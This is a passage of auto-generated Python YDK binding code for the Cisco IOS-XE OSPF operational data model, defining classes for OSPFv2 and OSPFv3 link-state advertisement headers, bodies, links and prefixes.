**range:** 0..65535
**config**\: False
.. attribute:: network
Network details
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: summary_mask
Summary mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_mask
External mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: body_flag_options
LSA body flags
**type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
"""
Network details
.. attribute:: network_mask
IP network mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
"""
OSPFv2 LSA link
.. attribute:: link_id (key)
Link ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_data (key)
Link data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_topology
Topology specific information
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
"""
Topology specific information
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
"""
Summary LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
"""
External LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled on the link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv2UnknownTlv(Entity):
"""
OSPFv2 Unknown TLV
.. attribute:: type (key)
TLV type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: length
TLV length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: value
TLV value
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()
self.yang_name = "ospfv2-unknown-tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('value', (YLeafList(YType.uint8, 'value'), ['int'])),
])
self.type = None
self.length = None
self.value = []
self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)
class Ospfv3LsaVal(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()
self.yang_name = "ospfv3-lsa-val"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)
class Header(Entity):
"""
Decoded OSPFv3 LSA header
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: lsa_header
LSA header
**type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader>`
**config**\: False
.. attribute:: lsa_hdr_options
OSPFv3 LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
"""
LSA header
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv3 LSA body
.. attribute:: network
OSPFv3 network
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network>`
**config**\: False
.. attribute:: prefix
OSPFv3 inter area prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix>`
**config**\: False
.. attribute:: ia_router
OSPFv3 inter area router
**type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter>`
**config**\: False
.. attribute:: lsa_external
OSPFv3 LSA external
**type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal>`
**config**\: False
.. attribute:: nssa
OSPFv3 NSSA
**type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa>`
**config**\: False
.. attribute:: link_data
OSPFv3 Link data
**type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData>`
**config**\: False
.. attribute:: ia_prefix
OSPFv3 Intra area prefixes
**type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix>`
**config**\: False
.. attribute:: lsa_flag_options
LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
.. attribute:: lsa_body_flags
LSA Body Flags
**type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
"""
OSPFv3 network
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_net_options
Network LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
"""
OSPFv3 inter area prefix
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ia_prefix
Inter area Prefix
**type**\: str
**config**\: False
.. attribute:: ia_prefix_options
Inter area prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
"""
OSPFv3 inter area router
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: destination_router_id
Router ID of the router being described by the LSA
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_ia_options
Inter area LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
"""
OSPFv3 LSA external
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
